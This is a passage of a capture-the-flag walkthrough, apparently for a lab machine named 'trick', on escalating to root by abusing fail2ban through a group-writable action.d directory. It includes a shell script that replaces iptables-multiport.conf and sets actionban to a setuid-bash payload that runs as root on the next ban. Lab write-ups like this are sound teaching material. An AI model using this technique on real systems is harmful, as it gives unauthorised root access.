So we know the fail2ban service is running. I checked GTFOBins but there is nothing there for fail2ban. After some googling I found exactly what I needed: this blog post explains how to abuse the fail2ban service to escalate privileges.
We basically need two conditions to be met:
We need write permission to /etc/fail2ban/action.d/iptables-multiport.conf
We need a way to restart the service that does not ask for a password.
The second condition is already met: as we saw, we can run the restart with sudo without a password.
For the first condition:
michael@trick:/etc/fail2ban/action.d$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
michael@trick:/etc/fail2ban/action.d$ ls -la
total 288
drwxrwx--- 2 root security 4096 Feb 5 18:15 .
drwxr-xr-x 6 root root 4096 Feb 5 18:15 ..
That file cannot be edited directly because it is not writable by us, but the directory is group-writable (rwx for the security group we are in), and renaming or creating entries in a directory only needs write permission on the directory, not on the file itself. So we can move the original .conf to .conf.bak and copy it back to a new .conf file that we own, and then edit that copy.
jail.conf tells us what it takes to actually trigger a ban (and with it the ban action) once the service has been restarted:
cat /etc/fail2ban/jail.conf
# "bantime" is the number of seconds that a host is banned.
bantime = 10s
# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime = 10s
# "maxretry" is the number of failures before a host get banned.
maxretry = 5
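The two steps above (replacing the non-writable file through the directory's write permission, then pointing actionban at our own command) as an added shell example; this is not code from the writeup or from the blog post it links to. The iptables-multiport.conf content is a constructed, abridged sample in the shape of the real file, the scratch directory stands in for /etc/fail2ban/action.d, and the chmod payload is an assumption about what one would put in actionban, which fail2ban runs as root when a jail bans an address.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Run it against a scratch
# copy; the paths, sample config and payload are assumptions.

# Return 0 if we can create/rename entries in DIR: needs write + execute on the
# directory, and no sticky bit (sticky would block renaming files we do not own).
can_replace_in_dir() {
    dir="$1"
    [ -w "$dir" ] && [ -x "$dir" ] || return 1
    # 10th character of the mode string is 't'/'T' when the sticky bit is set
    case "$(ls -ld "$dir" | cut -c10)" in
        t|T) return 1 ;;
    esac
    return 0
}

# Move the original aside and put a copy we own in its place. Renaming only
# needs write permission on the directory, not on the file, and as the owner of
# the new copy we can make it writable.
swap_in_writable_copy() {
    conf="$1"
    can_replace_in_dir "$(dirname "$conf")" || return 1
    mv "$conf" "$conf.bak" || return 1
    cp "$conf.bak" "$conf" || return 1
    chmod u+w "$conf" || return 1
    [ -w "$conf" ]
}

# Rewrite the 'actionban = ...' line with PAYLOAD. fail2ban executes actionban
# as root when a jail bans an IP, so PAYLOAD runs as root on the next ban.
# After this: restart the service via the sudo rule from the post, then cause
# maxretry (5) failures within findtime (10s) from jail.conf to fire the ban.
set_actionban() {
    conf="$1"; payload="$2"
    sed -i "s|^actionban *=.*|actionban = $payload|" "$conf" || return 1
    grep -qxF "actionban = $payload" "$conf"
}

# Constructed sample: an abridged iptables-multiport.conf in a scratch
# directory, made read-only to mimic the file we cannot edit directly.
make_scratch() {
    d="$(mktemp -d)"
    cat > "$d/iptables-multiport.conf" <<'EOF'
[Definition]
actionstart = <iptables> -N f2b-<name>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
EOF
    chmod 444 "$d/iptables-multiport.conf"
    printf '%s\n' "$d"
}

# Usage (scratch only; on the target the directory would be
# /etc/fail2ban/action.d and the payload is an assumed choice):
#   d="$(make_scratch)"
#   swap_in_writable_copy "$d/iptables-multiport.conf"
#   set_actionban "$d/iptables-multiport.conf" "chmod u+s /bin/bash"
```

The check in can_replace_in_dir is the one worth remembering: a read-only file inside a directory you can write to is not protected, and the listing on this box (drwxrwx--- root security, no sticky bit) is exactly that case.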